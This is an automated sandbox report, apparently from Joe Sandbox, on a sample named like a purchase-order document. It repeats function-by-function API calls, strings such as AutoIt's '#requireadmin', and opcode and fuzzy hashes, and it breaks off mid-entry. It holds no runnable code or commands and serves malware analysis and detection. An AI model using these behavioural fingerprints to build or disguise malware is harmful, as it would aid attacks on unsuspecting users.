Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: ccc296505cc10839d2bdb7db2f63df789ca4ddc2f465c0dee515076ff6de0342
Instruction ID: bfa7f76497f60578d843411cb2261d364b948ef7a0b605d2d22b3fe719605d73
Opcode Fuzzy Hash: ccc296505cc10839d2bdb7db2f63df789ca4ddc2f465c0dee515076ff6de0342
Instruction Fuzzy Hash: F021573660422066D335AB349C03FBB73D89FA6300F11442BF94E97181EB51AED6C2D5

Function 001D37B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 001D3840
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 001D3850
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 001D3876

Strings

Listbox, xrefs: 001D380F

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 315006e30887a9a4f5ac27230553c22aa549127b93415c6da5b67dad42bd81e7
Instruction ID: 5887ea9ba604a68a86806f2a913e453fd3b31b56180094e4b1aeb51c1bc63702
Opcode Fuzzy Hash: 315006e30887a9a4f5ac27230553c22aa549127b93415c6da5b67dad42bd81e7
Instruction Fuzzy Hash: 8021BE72610219BBEF218F54DC85FAB376AEF89750F118126FA109B290CB71EC5297A0

Function 001B49F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 001B4A08
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 001B4A5C
SetErrorMode.KERNEL32(00000000,?,?,001DCC08), ref: 001B4AD0

Strings

%lu, xrefs: 001B4A6F

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: 6599b33f3124f64663e4d78b99c4bc344553561b1f02643f0e2e9d1b0fed99fb
Instruction ID: b31b5ab45a94ccba4ff775f5d0f440f77945fea0f93d498c7855ddd872fecf07
Opcode Fuzzy Hash: 6599b33f3124f64663e4d78b99c4bc344553561b1f02643f0e2e9d1b0fed99fb
Instruction Fuzzy Hash: 78315075A00119EFD710DF64C885EAA77F8EF05308F148495F909DB262D771ED46CBA1

Function 001D41EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 001D424F
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 001D4264
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 001D4271

Strings

msctls_trackbar32, xrefs: 001D4226

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: f011bb83809de0c5b0c311d7096a49e06ab6e47ae2c3bcdf924b5c7a2d7bcb45
Instruction ID: 2e719307480e14e0b4d0381848db33416e8804f314b8ebe5ee63e306457a8b47
Opcode Fuzzy Hash: f011bb83809de0c5b0c311d7096a49e06ab6e47ae2c3bcdf924b5c7a2d7bcb45
Instruction Fuzzy Hash: 1411E072240208BFEF209E28DC06FAB3BACEF95B64F110525FA55E21A0D771D8619B20

Function 001A2F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00146B57: _wcslen.LIBCMT ref: 00146B6A

Part of subcall function 001A2DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 001A2DC5
Part of subcall function 001A2DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 001A2DD6
Part of subcall function 001A2DA7: GetCurrentThreadId.KERNEL32 ref: 001A2DDD
Part of subcall function 001A2DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 001A2DE4

GetFocus.USER32 ref: 001A2F78

Part of subcall function 001A2DEE: GetParent.USER32(00000000), ref: 001A2DF9

GetClassNameW.USER32(?,?,00000100), ref: 001A2FC3
EnumChildWindows.USER32(?,001A303B), ref: 001A2FEB

Strings

%s%d, xrefs: 001A2FFF

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: 710d5472d9ea923a56d2fdc177f1298bd36ceb90e5121f50aa459475b7956805
Instruction ID: baf566782493350b7025b0c3497a79246045fd9981e7ec0d60f3d0977a9ec3c5
Opcode Fuzzy Hash: 710d5472d9ea923a56d2fdc177f1298bd36ceb90e5121f50aa459475b7956805
Instruction Fuzzy Hash: A911A279700205ABCF147FA48C85FEE376AAFA6308F044075FD199B292DF309949CB60

Function 001D5882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 001D58C1
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 001D58EE
DrawMenuBar.USER32(?), ref: 001D58FD

Strings

0, xrefs: 001D588F

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: 3d6930f33411f88a950a7d173c10a63b14081380e34694965fdb1e1038350f1c
Instruction ID: 388d49f354aea0c43a4c3182e049f0de67b55ee934e057a3a864726af393f383
Opcode Fuzzy Hash: 3d6930f33411f88a950a7d173c10a63b14081380e34694965fdb1e1038350f1c
Instruction Fuzzy Hash: 2101C031600218EFDB209F15EC45BAEBBB9FF45361F00809AE848DA251DB308A85DF21

Function 0019D3A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0019D3BF
FreeLibrary.KERNEL32 ref: 0019D3E5

Strings

X64, xrefs: 0019D2A8
GetSystemWow64DirectoryW, xrefs: 0019D3B9

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 3013587201-2590602151
Opcode ID: 28feff0ee3426bfcc4d5010bd25c7d6a2f38430cb224143079815edde21938fe
Instruction ID: cb5326269a2c2e966aceee3a7f4d4ff281f1b98660161e2d45574c09d0915009
Opcode Fuzzy Hash: 28feff0ee3426bfcc4d5010bd25c7d6a2f38430cb224143079815edde21938fe
Instruction Fuzzy Hash: 42F02BB1406723DBDF3C6B24AD489AA3318BF11742B95875AF423F10D5DB70CE86C682

Function 001A007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5c5ccb5473f9f4e7c3eee5605f9242c698286ee98afed27a0fcb4d1d3e3b258
Instruction ID: 1debe85afaceadc88d4a9c85c6ae1f9b2ef1a6574f129f8e36797e3d6c1f0733
Opcode Fuzzy Hash: f5c5ccb5473f9f4e7c3eee5605f9242c698286ee98afed27a0fcb4d1d3e3b258
Instruction Fuzzy Hash: 18C15B79A0020AEFDB15CFA4C894BAEB7B5FF49304F218599E505EB251D731EE81CB90

Function 001C342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 001C3459
CoUninitialize.OLE32 ref: 001C3463
VariantInit.OLEAUT32(?), ref: 001C346E
VariantClear.OLEAUT32(?), ref: 001C371B

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Variant$ClearInitInitializeUninitialize
String ID:
API String ID: 1998397398-0
Opcode ID: cc9243115880dfdb1f1dfa5f37561a4385d5c85fd0bbc20e0a56b3dd1da43799
Instruction ID: 5a0974e35b6748edc973ba36270812cc5c5de39003b712b53f3b959dff0903d3
Opcode Fuzzy Hash: cc9243115880dfdb1f1dfa5f37561a4385d5c85fd0bbc20e0a56b3dd1da43799
Instruction Fuzzy Hash: 1BA114756042109FCB14DF28C485E2AB7E5FF98714F05885DF99A9B3A2DB30EE05CB92

Function 001A0436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,001DFC08,?), ref: 001A05F0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,001DFC08,?), ref: 001A0608
CLSIDFromProgID.OLE32(?,?,00000000,001DCC40,000000FF,?,00000000,00000800,00000000,?,001DFC08,?), ref: 001A062D
_memcmp.LIBVCRUNTIME ref: 001A064E

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 535016accd12219b343f247a4c2aa1e249b1041e0fc17a633ded991cdefe0b29
Instruction ID: 597e065fed8a34c4878cca2b6e8af00dca11112a40910a25f5937b9328cdaf1b
Opcode Fuzzy Hash: 535016accd12219b343f247a4c2aa1e249b1041e0fc17a633ded991cdefe0b29
Instruction Fuzzy Hash: C7811A75A00109EFCB05DF94C988EEEB7B9FF8A315F204558E506EB250DB71AE46CB60

Function 00181391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 001814C0

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 80d969e5acbbe3072d136cdab1be6bb555934799ec456128bba353f77374e972
Instruction ID: c1028a7e8015a5469842e718d5686b00af1b8583a992edaeff6a5b68546b70f8
Opcode Fuzzy Hash: 80d969e5acbbe3072d136cdab1be6bb555934799ec456128bba353f77374e972
Instruction Fuzzy Hash: BF413A33A00500BBDB257BB99C45ABE3BADEF61330F144229F819D2191E7748A539F61

Function 001D6278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00B8F640,?), ref: 001D62E2
ScreenToClient.USER32(?,?), ref: 001D6315
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 001D6382

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: abd356eaccd988d4c34e105561bd75bc3ee036f10033c7fc6fcee41c9977729a
Instruction ID: b982cb899cb9af679a022a45213fc89b706688e0e672f8a7e86b6014c2347c61
Opcode Fuzzy Hash: abd356eaccd988d4c34e105561bd75bc3ee036f10033c7fc6fcee41c9977729a
Instruction Fuzzy Hash: 58512C75A00209AFCF14DF68D8849AE7BB5FF55360F10825AF959973A0D730ED91CB90

Function 001C1AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 001C1AFD
WSAGetLastError.WSOCK32 ref: 001C1B0B
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 001C1B8A
WSAGetLastError.WSOCK32 ref: 001C1B94

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: 2d628aac1900364692552d05848229afd27fe0148e6a82e36426ea5c2fda7933
Instruction ID: 1012104c957695cd8d7190eea263dc0d4315dcddb4132ecce167fcaa02e5e313
Opcode Fuzzy Hash: 2d628aac1900364692552d05848229afd27fe0148e6a82e36426ea5c2fda7933
Instruction Fuzzy Hash: B941B234640201AFE720AF24C886F2977E5AB55718F54844CF92A9F7D3D772DD42CB90

Function 0017B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1052beb42853ecc95dea6d39624b2704f7d998e83a32dffc2011e9515d120e6
Instruction ID: 7e893bd5fa564953d64bedd7fa7348031a3544199d9f998c30598db354f2ac9b
Opcode Fuzzy Hash: e1052beb42853ecc95dea6d39624b2704f7d998e83a32dffc2011e9515d120e6
Instruction Fuzzy Hash: AE411B72A04704BFD7249F38CC81B6A7BF9EB98710F10852EF54BDB282D77199118B80

Function 001B56D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 001B5783
GetLastError.KERNEL32(?,00000000), ref: 001B57A9
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 001B57CE
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 001B57FA

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 1db8a3a8f64a913b0ed80aae8d43aad218f486822c97807e2b69e9d1b6948999
Instruction ID: ac4eea02900b73831ee2386fc33be73f5472c8509567f1100753ada4b29edd1c
Opcode Fuzzy Hash: 1db8a3a8f64a913b0ed80aae8d43aad218f486822c97807e2b69e9d1b6948999
Instruction Fuzzy Hash: 6B411D39600611DFCB11DF55D544A5EBBE2EF99320B198888E84AAF372CB35FD40CB91

Function 0017D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00166D71,00000000,00000000,001682D9,?,001682D9,?,00000001,00166D71,8BE85006,00000001,001682D9,001682D9), ref: 0017D910
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0017D999
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0017D9AB
__freea.LIBCMT ref: 0017D9B4

Part of subcall function 00173820: RtlAllocateHeap.NTDLL(00000000,?,00211444,?,0015FDF5,?,?,0014A976,00000010,00211440,001413FC,?,001413C6,?,00141129), ref: 00173852

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 90ec978d2fc0f84f691a45b375e549cad0c8eb1893f52d9b885917cbb9c56784
Instruction ID: 717fb07c240f8cdacf47b091976436b71b0feff291d4613a4ab5b9803fe272da
Opcode Fuzzy Hash: 90ec978d2fc0f84f691a45b375e549cad0c8eb1893f52d9b885917cbb9c56784
Instruction Fuzzy Hash: F231CD72A0021AABDF259F64EC41EAE7BB5EF40314F158268FD08D7250EB35CD50CB90

Function 001D52C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001024,00000000,?), ref: 001D5352
GetWindowLongW.USER32(?,000000F0), ref: 001D5375
SetWindowLongW.USER32(?,000000F0,00000000), ref: 001D5382
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 001D53A8

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: LongWindow$InvalidateMessageRectSend
String ID:
API String ID: 3340791633-0
Opcode ID: 9601c154b3b1dfc2a8fdc9b8e0f832a4f2c82d3f7880e2dd8e31315c02ec4032
Instruction ID: ae25d632e8096a5f84f41101dc23acbaf8574e5271a1ba6bf53005bc88b44796
Opcode Fuzzy Hash: 9601c154b3b1dfc2a8fdc9b8e0f832a4f2c82d3f7880e2dd8e31315c02ec4032
Instruction Fuzzy Hash: 6631A034A56A08FFEB349E14CC46BE97767BB143D0F584103FA11963E1C7B4A990DB82

Function 001AAB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 001AABF1
SetKeyboardState.USER32(00000080,?,00008000), ref: 001AAC0D
PostMessageW.USER32(00000000,00000101,00000000), ref: 001AAC74
SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 001AACC6

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: b9afa054a639aade496884fe15731407f80baec0c532f73bf15424a2caca7cee
Instruction ID: 334beef9445980ec1954ea1bdd381796fecca5f3304c883953411ce4c7fc4b8b
Opcode Fuzzy Hash: b9afa054a639aade496884fe15731407f80baec0c532f73bf15424a2caca7cee
Instruction Fuzzy Hash: B1313934A007186FFF35CB648C087FA7BA6AF86330F84471AE481962D9C3759981C792

Function 001D7674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 001D769A
GetWindowRect.USER32(?,?), ref: 001D7710
PtInRect.USER32(?,?,001D8B89), ref: 001D7720
MessageBeep.USER32(00000000), ref: 001D778C

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
